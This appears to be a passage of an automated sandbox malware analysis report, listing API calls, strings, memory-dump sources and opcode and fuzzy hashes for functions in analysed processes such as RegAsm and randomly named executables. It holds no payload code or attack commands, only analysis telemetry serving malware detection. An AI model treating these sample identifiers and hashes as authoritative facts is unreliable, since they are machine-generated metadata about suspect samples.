GetLastError.KERNEL32(?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8,0040BDA8,?,00416E6D,?), ref: 004241FC

Part of subcall function 004241C2: CloseHandle.KERNEL32(FFFFFFFE,0042420C,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8,0040BDA8), ref: 004241D2

___initconout.LIBCMT ref: 0042420C

Part of subcall function 00424184: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241B3,00421C1F,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8), ref: 00424197

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8), ref: 00424221

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction ID: daf606a8d683033c96f790e5cebbb7c3d718dd05ed61dfd599687816ed725ea8
Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction Fuzzy Hash: E4F03736700124BBCF226F95FC0899A3F26FF453B1F454565FE1995130CA319870AB98

Function 0041029D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041032D

Strings

pow, xrefs: 00410305, 00410322

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction ID: fc6d2ca4dc19ba0b715d37a90518746425c4eaa4db822c587b4b2213400e0bc5
Opcode Fuzzy Hash: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction Fuzzy Hash: 6F519F71A0A60587CB157714DA413EB3B90AB00711F644D6BE8A1463E9EB7D8CF2DA8F

Function 00401E50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408080: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407F9B,?,?,?,?,00407F9B,0000000C,00432FA4,0000000C), ref: 004080E0

Strings

ios_base::failbit set, xrefs: 00401E62
ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 50fcd3a1a371244ec7a0f3f24a710ecb3351835c0196af839c5ad707446f783d
Instruction ID: 4f5bf0a45fc4208832a8654eef8c337e9c06d50c54c87a988f481c954303cb93
Opcode Fuzzy Hash: 50fcd3a1a371244ec7a0f3f24a710ecb3351835c0196af839c5ad707446f783d
Instruction Fuzzy Hash: 7F4147B1504305AFC304DF29C841A9BF7E8EF89310F14862FF994A76A1E778E945CB99

Function 0040A420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0040A45F
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A513

Strings

csm, xrefs: 0040A4FD

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction ID: 18bede24dd224cfa91d1e00103c3baabbd685d05025061fa587fd2bb58ff80c9
Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction Fuzzy Hash: 8041D934A002189BCF10DF69C885A9E7BB0FF44318F14817BE8146B3D2D779A921CB9A

Function 0040AD2D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0040AD52

Strings

MOC, xrefs: 0040AD64
RCC, xrefs: 0040AD6C

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction ID: 578a82eb6ed92837561ac62ae5e682fef8a2830442736a5cd94d75dd4d38702e
Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction Fuzzy Hash: 2F417D71900209AFCF16DF94CD81AEEBBB5FF48304F19406AF9047B291D3399960DB95

Function 00407413 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407D98
___raise_securityfailure.LIBCMT ref: 00407E80

Strings

@SC, xrefs: 00407E7B

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: 42319827a0e0b74c587616dcc60c70791287d7417a5014e862dc5be5bea1f8a0
Instruction ID: c5c0fd815b2f08e14ceb602fe243d88e4d65426d2e31bcd62793ea7bd9420f3f
Opcode Fuzzy Hash: 42319827a0e0b74c587616dcc60c70791287d7417a5014e862dc5be5bea1f8a0
Instruction Fuzzy Hash: 972104B4640A009BD328CF15FD857983BF4BB68359FA0643AE9088B3B0D3B46484CF1E

Function 00407E93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407E9E
___raise_securityfailure.LIBCMT ref: 00407F5B

Strings

@SC, xrefs: 00407F56

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction ID: 2125179719012bf3b699bacd38cc00c528494cfbc9043f550ba33f2ea8b81d37
Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction Fuzzy Hash: DC11E3B4651A04DBC318CF15F8817883BB4BB28346B50B03AE8088B371E3B4A5958F5E

Function 00401870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00401875
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA

Part of subcall function 0040589A: _Yarn.LIBCPMT ref: 004058B9
Part of subcall function 0040589A: _Yarn.LIBCPMT ref: 004058DD

Strings

bad locale name, xrefs: 004018C8

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction ID: fbb5483a5c0b3d6c860fa312477ba2c73c4b5eacc305877fe335d4945849315c
Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction Fuzzy Hash: D8F01261505B508ED370DF368404743BEE0AF25714F048E2ED4C9D7A91D379E508CBA9

Function 00405AAE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405AB5

Strings

1]@, xrefs: 00405ADB
pdB, xrefs: 00405AF1

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID: 1]@$pdB
API String ID: 431132790-2574904542
Opcode ID: 73ce1e61eeabf46a09a1e5cf8c5bfbef05ff3b583e132448a225ea9f7212eaca
Instruction ID: 123d69972286fd69fb551aecc998dcfff066a917831aeb16d417dea724d1ca27
Opcode Fuzzy Hash: 73ce1e61eeabf46a09a1e5cf8c5bfbef05ff3b583e132448a225ea9f7212eaca
Instruction Fuzzy Hash: 1B01D6B4A00715CFC761DF28C540A5ABBF0FF08318B51896EE48ADB751D776AA40CF48

Function 004012D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004012D5

Part of subcall function 004055CE: std::invalid_argument::invalid_argument.LIBCONCRT ref: 004055DA

___std_exception_copy.LIBVCRUNTIME ref: 004012FC

Strings

string too long, xrefs: 004012D0

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: 26fc9a0f88cba3b3d08977187bf2055019bce32afe2b0aefe6f2504baa2ffc18
Instruction ID: 272e35dc6304a19a67255a0f261e943e5561bca0c73071cc2d95ade12bed5fb2
Opcode Fuzzy Hash: 26fc9a0f88cba3b3d08977187bf2055019bce32afe2b0aefe6f2504baa2ffc18
Instruction Fuzzy Hash: DEE0C2B2A343119BD200AF94AC01986B6D99F55314712CA2FF444F3200F3B8A8808768

Analysis Process: wxfM3haI2K.exePID: 1456, Parent PID: 5604COMMON

Execution Graph

Execution Coverage:	18.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	156
Total number of Limit Nodes:	7

Executed Functions

Function 0568C8A0 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.1950657256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5680000_wxfM3haI2K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77547545eb062404466ed1002c4ed0bba513cd4909905af9a08649871d32cc47
Instruction ID: f7ad15b126e36509d321836d31ec38d3e4675c75bb3043b8bd722a4b3882751b
Opcode Fuzzy Hash: 77547545eb062404466ed1002c4ed0bba513cd4909905af9a08649871d32cc47
Instruction Fuzzy Hash: 59815C70A007058FEB24DF29D45476ABBF1FF88200F048A6DD496DBB50D775E845CBA5

Function 0568598C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 05685A49

Memory Dump Source

Source File: 0000001A.00000002.1950657256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5680000_wxfM3haI2K.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 84b97389c23a7902d46fc657a838b6c510a68f9853c8ac679279f430214434dc
Instruction ID: 09f00ff8a3916fb61b9057d7f24ea5c76008b5cec6ee751113e038d273e88371
Opcode Fuzzy Hash: 84b97389c23a7902d46fc657a838b6c510a68f9853c8ac679279f430214434dc
Instruction Fuzzy Hash: A741E2B0C0072DCBDB24DFA9C88479DBBF5BF48314F2481AAD409AB251DB756946CF90

Function 0568456C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 05685A49

Memory Dump Source

Source File: 0000001A.00000002.1950657256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5680000_wxfM3haI2K.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 497ccfbfbe762d2c650c61b35abfad896e873dca7b03cee78fd2495cc49c01a6
Instruction ID: 14f6c7130fa039c4a2aa4bd96bec9ad86a23f148cd6053f945d4113b460cdf0a
Opcode Fuzzy Hash: 497ccfbfbe762d2c650c61b35abfad896e873dca7b03cee78fd2495cc49c01a6
Instruction Fuzzy Hash: 2141E2B0C0072DDBDB24DFA9C884B9DBBF5BF48304F2081AAD409AB251DB756946CF90

Function 074E1048 Relevance: 1.6, APIs: 1, Instructions: 77
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,?,?,?), ref: 074E10FD

Memory Dump Source

Source File: 0000001A.00000002.1952790752.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_74e0000_wxfM3haI2K.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fbf64a2f558aaacc09f69c37fd64523de30df8bef6a959522cac85755efb35cf
Instruction ID: 888310562559d076deadb8360835365a5c7502527bce916cbaa8cd26140e12b9
Opcode Fuzzy Hash: fbf64a2f558aaacc09f69c37fd64523de30df8bef6a959522cac85755efb35cf
Instruction Fuzzy Hash: 332137B5D003489FCB20DFA9D885B9EBBF8EF48320F14845AE519A7751C735A981CFA0

Function 0568E8C8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0568ED4E,?,?,?,?,?), ref: 0568EE0F

Memory Dump Source

Source File: 0000001A.00000002.1950657256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5680000_wxfM3haI2K.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d54057fe18d32b2b31c7011f8c16639288f06d918da769109a6dc179e633b31e
Instruction ID: 49dbd61dde60ffdd563b3363080649132c56ef38dcd64a530f5cfc85ba1a1e87
Opcode Fuzzy Hash: d54057fe18d32b2b31c7011f8c16639288f06d918da769109a6dc179e633b31e
Instruction Fuzzy Hash: A52105B5D003089FDB10DF9AD884AEEBBF8EB48310F14841AE915A7310D375A945CFA1

Function 0568ED80 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0568ED4E,?,?,?,?,?), ref: 0568EE0F

Memory Dump Source

Source File: 0000001A.00000002.1950657256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5680000_wxfM3haI2K.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a1bcfe34cf1a3aad46014575e0fc29feffd4939cbd4c462d0a51f132f076bd27
Instruction ID: 89e04a79ea45deeec8b884933a937949ecfd3cf550902dfd654e04679b498933
Opcode Fuzzy Hash: a1bcfe34cf1a3aad46014575e0fc29feffd4939cbd4c462d0a51f132f076bd27
Instruction Fuzzy Hash: A021F2B5D003489FDB10CFA9D984AEEBFF8EB48310F14841AE959A7250D379A945CF61

Function 074E1B0B Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32(?,00000000), ref: 074E1B8C

Memory Dump Source

Source File: 0000001A.00000002.1952790752.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_74e0000_wxfM3haI2K.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: d7d8d38d82d3183a702ce2fac97a67880b58ba4935565d843be22acdaf5ed39d
Instruction ID: a1428f2da013ace59a5f638f810dec9f2e9b95b7548ac9b00bc4133782ecb8ed
Opcode Fuzzy Hash: d7d8d38d82d3183a702ce2fac97a67880b58ba4935565d843be22acdaf5ed39d
Instruction Fuzzy Hash: B32125B1D007099FDB10CF9AC884AEEFBF8EB48221F14842AD459A3340D334A905CB65

Function 074E1B10 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32(?,00000000), ref: 074E1B8C

Memory Dump Source

Source File: 0000001A.00000002.1952790752.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_74e0000_wxfM3haI2K.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: d97858a13566a3ce98934965911da19f8fd94cd578e29a2f63673b051dfdbe27
Instruction ID: 837abf760a478c58615fdecdc0932820b3dfcb7930fc5d7a5a1dae0f80c3b607
Opcode Fuzzy Hash: d97858a13566a3ce98934965911da19f8fd94cd578e29a2f63673b051dfdbe27
Instruction Fuzzy Hash: 0F2115B1D0171A9FDB10CF9AC884AEEFBF9FB48321F14842AD459A3340D374A945CB65

Function 0568CD20 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0568CB81,00000800,00000000,00000000), ref: 0568CD92

Memory Dump Source

Source File: 0000001A.00000002.1950657256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5680000_wxfM3haI2K.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2f3347aafc5783a6b560c22ae994406022d8b3de729efc3801e9e5e1179f5928
Instruction ID: e532bfc826da1a12081dea7c3f833d574cb67f3bd06c1c1f08078fcc1e269949
Opcode Fuzzy Hash: 2f3347aafc5783a6b560c22ae994406022d8b3de729efc3801e9e5e1179f5928
Instruction Fuzzy Hash: B611F4B6C002099FDB10DF9AD445BAEBBF4EB89310F14852AD559A7600C375A946CFA1

Function 0568C578 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0568CB81,00000800,00000000,00000000), ref: 0568CD92

Memory Dump Source

Source File: 0000001A.00000002.1950657256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5680000_wxfM3haI2K.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9f46664dad1bfaeab46d466a0239f4bacb80b5b902e684321da5cc3b0374ea85
Instruction ID: 4a3345929165f36569c29ac9f2436def8ef49629f2d207ef225495c0a8a418e9
Opcode Fuzzy Hash: 9f46664dad1bfaeab46d466a0239f4bacb80b5b902e684321da5cc3b0374ea85
Instruction Fuzzy Hash: E61117B6C003099FDB10DF9AD445AAEFBF4EF88310F10852AD515AB600C375A945CFA1

Function 074EDD23 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 074EDD87

Memory Dump Source

Source File: 0000001A.00000002.1952790752.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_74e0000_wxfM3haI2K.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: ca8639c3836df5cd1aef7a2cded1c6e2c36dbe216dc6c3d5d9f0140d758ac8a3
Instruction ID: f6468c6e507f69bbfae44be8f8354120b6e686abd550bd85654a374a0430f429
Opcode Fuzzy Hash: ca8639c3836df5cd1aef7a2cded1c6e2c36dbe216dc6c3d5d9f0140d758ac8a3
Instruction Fuzzy Hash: 181136B5D003098FDB20DFAAC485BDEFBF4EF48220F14882AD459A7240CB79A941CF94

Function 0568CAA0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0568CB06

Memory Dump Source

Source File: 0000001A.00000002.1950657256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5680000_wxfM3haI2K.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f1a762c7667e635209f8b0bea41048e97b19d8233b4134cb76e415481836dd35
Instruction ID: bb757f86a1dd5b61c97ca8fceed26f3b1042271225c247f7a96e3a1eee0273e0
Opcode Fuzzy Hash: f1a762c7667e635209f8b0bea41048e97b19d8233b4134cb76e415481836dd35
Instruction Fuzzy Hash: 0E11DFB5C007498FDB20DF9AC444A9EFBF4EB88320F14852AD469A7610C379A946CFA5

Function 074EDD28 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 074EDD87

Memory Dump Source

Source File: 0000001A.00000002.1952790752.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_74e0000_wxfM3haI2K.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 52eb72e026f1568453adee6facbcfddcdde8adcaf45108e58ab37ec77a2fe27e
Instruction ID: 231100d5185f239ae66e598e5c63f4875a20ad920833518086af11f59c4a83d4
Opcode Fuzzy Hash: 52eb72e026f1568453adee6facbcfddcdde8adcaf45108e58ab37ec77a2fe27e
Instruction Fuzzy Hash: A11136B5D003098FDB20DFAAC445BDEFBF4EB48220F14881AC459A7240CB796941CF94

Function 02FAD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1943042552.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2fad000_wxfM3haI2K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2dbe2f2586498871d103e3e92fbbb617d7c7005f57008b3d90ed42b54a311f
Instruction ID: 35a960b872137d75d2f39e23cda5e0fdc356e6c67a75fe08e0634d00fbc43a62
Opcode Fuzzy Hash: 5d2dbe2f2586498871d103e3e92fbbb617d7c7005f57008b3d90ed42b54a311f
Instruction Fuzzy Hash: E32145B2A04300DFDB04DF00D9C4B16BFA5FB88368F248169EA090B756C336D846CBA2

Function 02FBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1943092719.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2fbd000_wxfM3haI2K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df2fcad42f866bfdacce74f3d7bdbac9fb76c77172f6229c068e8c1a8008fe80
Instruction ID: 44787af8edf26eb9c8665826ada28972f034ec7aff871170da4e2f771a68f8a3
Opcode Fuzzy Hash: df2fcad42f866bfdacce74f3d7bdbac9fb76c77172f6229c068e8c1a8008fe80
Instruction Fuzzy Hash: 2B212575A04300DFDB15DF14D9C4B56BB61EF84794F20C56DDA0A0B24AC336D407CA62

Function 02FBD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1943092719.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2fbd000_wxfM3haI2K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5ca9b00a8ebd240284ce5ff0d7232641a3aedd0a5fc905740a9a83a257e5277
Instruction ID: 328bb5da61c58fabe5149f0ad120fc0d5b6a709326b92908b96ee102d761c7b5
Opcode Fuzzy Hash: f5ca9b00a8ebd240284ce5ff0d7232641a3aedd0a5fc905740a9a83a257e5277
Instruction Fuzzy Hash: 8B21F575E04244DFDB16DF11D9C0B55BB65FF84314F20C56DDA494B252C336D846CB62

Function 02FBD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1943092719.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2fbd000_wxfM3haI2K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f49616f64148f4fe1eb09959c13c74a71992d79fb95928073dfe590251617376
Instruction ID: 601253a53b771971649856e0dbc566edfa7b91c41e493f409dc00afa4607b25f
Opcode Fuzzy Hash: f49616f64148f4fe1eb09959c13c74a71992d79fb95928073dfe590251617376
Instruction Fuzzy Hash: 43218E755093808FCB03CF24D990755BF71EF46214F28C5EAD9898B6A7C33A980ACB62

Function 02FAD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1943042552.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2fad000_wxfM3haI2K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: 27e08a650c8e5eb8941d3e64d442b30f371e9f5152c47f408ca93e5637088c7c
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: F211E6B6904240CFCB15CF14D5C4B16BF72FB84328F24C6A9D9090B756C33AD456CBA1

Function 02FBD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1943092719.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2fbd000_wxfM3haI2K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: 8f04f44ac1782580f83f9212600b4dd30294edc040a954ef593026342531d285
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: 7611BB75904280DFCB06CF10C9C0B55BBA2FF84324F24C6ADD9494B296C33AD80ACB62

Analysis Process: XBckuYbXje.exePID: 396, Parent PID: 5604COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	96
Total number of Limit Nodes:	9

Executed Functions

Function 063467D0 Relevance: .5, Instructions: 546COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 885fca99c4e4c55fdcf41e3dd4e21b0e5fc8abf188ca23fb455245bc1f8e52fd
